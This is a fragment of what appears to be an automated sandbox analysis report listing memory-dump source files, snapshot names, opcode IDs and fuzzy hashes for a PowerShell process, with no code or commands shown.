                                                                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000012.00000002.784906636.0000000004970000.00000040.00000800.00020000.00000000.sdmp, Offset: 04970000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_18_2_4970000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 183621728104f55e9f0abb85db7f9f17ba9662321c38eb8b6454fda0058a5c4e
                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 6fbebca2d969c4ae119c4f896384a890f2b309ffc709159aea2cd785fc9e2fc7
                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 183621728104f55e9f0abb85db7f9f17ba9662321c38eb8b6454fda0058a5c4e
                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: FD41D1747046118BEB189B30E4A03BE7BA7EFC4349F144579D9068B794DF7AAD46CB80
                                                                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000012.00000002.784906636.0000000004970000.00000040.00000800.00020000.00000000.sdmp, Offset: 04970000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_18_2_4970000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 966b12d0a2dfa5232fed00c35c5b9411042c2be53c73ba537a1a950591c1330c
                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 868b013ca4dd3ed402cf2d7090db69761b77a18a038cbd55dba76a9ecd49b13a
                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 966b12d0a2dfa5232fed00c35c5b9411042c2be53c73ba537a1a950591c1330c
                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 35213631608A149FD724DB28C8407AA7BE5EF8134CF018968D149DB699DBF5BD0987A0
                                                                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000012.00000002.784906636.0000000004970000.00000040.00000800.00020000.00000000.sdmp, Offset: 04970000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_18_2_4970000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 5ff256358fc5c8080115cf76baf1abd7252700019dac0f21b7330cfabb747eaf
                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 8d8f8247561b748e8d8304b3b23edb2607c89eadb5e6fbafd688b8222d0d013e
                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5ff256358fc5c8080115cf76baf1abd7252700019dac0f21b7330cfabb747eaf
                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A821B4718086448FDF14CF58D8806DDBBF4FF89328F14865ED008AB26AC775A946CBE1
                                                                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000012.00000002.784906636.0000000004970000.00000040.00000800.00020000.00000000.sdmp, Offset: 04970000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_18_2_4970000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 20a38c333513e0817f5cbd897603ebdcd5d0fcc6b985ca158706c3cfaa860a55
                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: f98fe4ced0c4aa87e55c32871d1df14945cde7e55a1c8c44e93e7bbe6ecf577a
                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 20a38c333513e0817f5cbd897603ebdcd5d0fcc6b985ca158706c3cfaa860a55
                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: DC2133B1C012188FDB40CFA9D884BDEFBF4FF88314F14812AE808AB244D774A904CBA1
                                                                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000012.00000002.784906636.0000000004970000.00000040.00000800.00020000.00000000.sdmp, Offset: 04970000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_18_2_4970000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 2d37c2241e6ce134140e9457ec6f37d9a66760e8e409c79b14b11031c94099eb
                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 2f868f12fac27639029fa39d35459afe7d882a9adb3a49f211d3fd657ce81b3b
                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2d37c2241e6ce134140e9457ec6f37d9a66760e8e409c79b14b11031c94099eb
                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7B11897250C3804FCB168B28D8513D6BFE0DF82316F0C84FADD888F196D2389914C7A6
                                                                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000012.00000002.784906636.0000000004970000.00000040.00000800.00020000.00000000.sdmp, Offset: 04970000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_18_2_4970000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: f9cab51a1bd5405ef153749bf87f87f43369902880fb38d8bc306b844af7fd37
                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 8f3b1922d327c2908c7c1554ae26ca1e11bdcad59e4f21825ba4e3a95417819d
                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f9cab51a1bd5405ef153749bf87f87f43369902880fb38d8bc306b844af7fd37
                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 351103B1C052588FDB50CF99D884BDEFBF4FB89314F14816AE808AB244D774A904CBA1
                                                                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%